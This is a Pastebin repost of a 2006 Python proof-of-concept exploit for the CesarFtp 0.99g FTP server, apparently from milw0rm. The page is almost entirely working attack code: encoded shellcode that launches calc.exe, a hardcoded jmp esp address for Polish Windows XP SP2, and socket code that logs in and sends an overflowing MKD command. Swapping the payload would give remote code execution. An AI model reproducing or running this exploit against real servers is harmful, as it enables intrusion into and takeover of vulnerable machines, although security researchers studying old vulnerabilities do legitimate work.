API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Sep 9th, 2017
692
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.30 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. #CesarFtp 0.99g 0day Exploit
  3. #Proof of Concept: execute calc.exe
  4. #Tested on XP sp2 polish
  5. #Bug found by h07 [h07@interia.pl]
  6. #Date: 10.06.2006
  7.  
  8. from socket import *
  9.  
  10. shellcode = ( #execute calc.exe <metasploit.com>
  11. "\x31\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x09"
  12. "\xde\x42\xd1\x83\xeb\xfc\xe2\xf4\xf5\xb4\xa9\x9c\xe1\x27\xbd\x2e"
  13. "\xf6\xbe\xc9\xbd\x2d\xfa\xc9\x94\x35\x55\x3e\xd4\x71\xdf\xad\x5a"
  14. "\x46\xc6\xc9\x8e\x29\xdf\xa9\x98\x82\xea\xc9\xd0\xe7\xef\x82\x48"
  15. "\xa5\x5a\x82\xa5\x0e\x1f\x88\xdc\x08\x1c\xa9\x25\x32\x8a\x66\xf9"
  16. "\x7c\x3b\xc9\x8e\x2d\xdf\xa9\xb7\x82\xd2\x09\x5a\x56\xc2\x43\x3a"
  17. "\x0a\xf2\xc9\x58\x65\xfa\x5e\xb0\xca\xef\x99\xb5\x82\x9d\x72\x5a"
  18. "\x49\xd2\xc9\xa1\x15\x73\xc9\x91\x01\x80\x2a\x5f\x47\xd0\xae\x81"
  19. "\xf6\x08\x24\x82\x6f\xb6\x71\xe3\x61\xa9\x31\xe3\x56\x8a\xbd\x01"
  20. "\x61\x15\xaf\x2d\x32\x8e\xbd\x07\x56\x57\xa7\xb7\x88\x33\x4a\xd3"
  21. "\x5c\xb4\x40\x2e\xd9\xb6\x9b\xd8\xfc\x73\x15\x2e\xdf\x8d\x11\x82"
  22. "\x5a\x9d\x11\x92\x5a\x21\x92\xb9\xc9\x76\x4e\xde\x6f\xb6\x52\x30"
  23. "\x6f\x8d\xcb\x30\x9c\xb6\xae\x28\xa3\xbe\x15\x2e\xdf\xb4\x52\x80"
  24. "\x5c\x21\x92\xb7\x63\xba\x24\xb9\x6a\xb3\x28\x81\x50\xf7\x8e\x58"
  25. "\xee\xb4\x06\x58\xeb\xef\x82\x22\xa3\x4b\xcb\x2c\xf7\x9c\x6f\x2f"
  26. "\x4b\xf2\xcf\xab\x31\x75\xe9\x7a\x61\xac\xbc\x62\x1f\x21\x37\xf9"
  27. "\xf6\x08\x19\x86\x5b\x8f\x13\x80\x63\xdf\x13\x80\x5c\x8f\xbd\x01"
  28. "\x61\x73\x9b\xd4\xc7\x8d\xbd\x07\x63\x21\xbd\xe6\xf6\x0e\x2a\x36"
  29. "\x70\x18\x3b\x2e\x7c\xda\xbd\x07\xf6\xa9\xbe\x2e\xd9\xb6\xb2\x5b"
  30. "\x0d\x81\x11\x2e\xdf\x21\x92\xd1")
  31.  
  32. def intel_order(i):
  33. a = chr(i % 256)
  34. i = i >> 8
  35. b = chr(i % 256)
  36. i = i >> 8
  37. c = chr(i % 256)
  38. i = i >> 8
  39. d = chr(i % 256)
  40. str = "%c%c%c%c" % (a, b, c, d)
  41. return str
  42.  
  43. host = "192.168.13.132"
  44. port = 21
  45. user = "ftp"
  46. password = "ftp"
  47. EIP = 0x77D8AF0A #jmp esp <shell32.dll XP sp2 polish>
  48.  
  49. s = socket(AF_INET, SOCK_STREAM)
  50. s.connect((host, port))
  51. print s.recv(1024)
  52.  
  53. s.send("user %s\r\n" % (user))
  54. print s.recv(1024)
  55.  
  56. s.send("pass %s\r\n" % (password))
  57. print s.recv(1024)
  58.  
  59. buffer = "MKD "
  60. buffer += "\n" * 671
  61. buffer += "A" * 3 + intel_order(EIP)
  62. buffer += "\x90" * 10 + shellcode
  63. buffer += "\r\n"
  64.  
  65. print "len: %d" % (len(buffer))
  66.  
  67. s.send(buffer)
  68. print s.recv(1024)
  69.  
  70. s.close()
  71.  
  72. #EoF
  73.  
  74. # milw0rm.com [2006-06-12]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!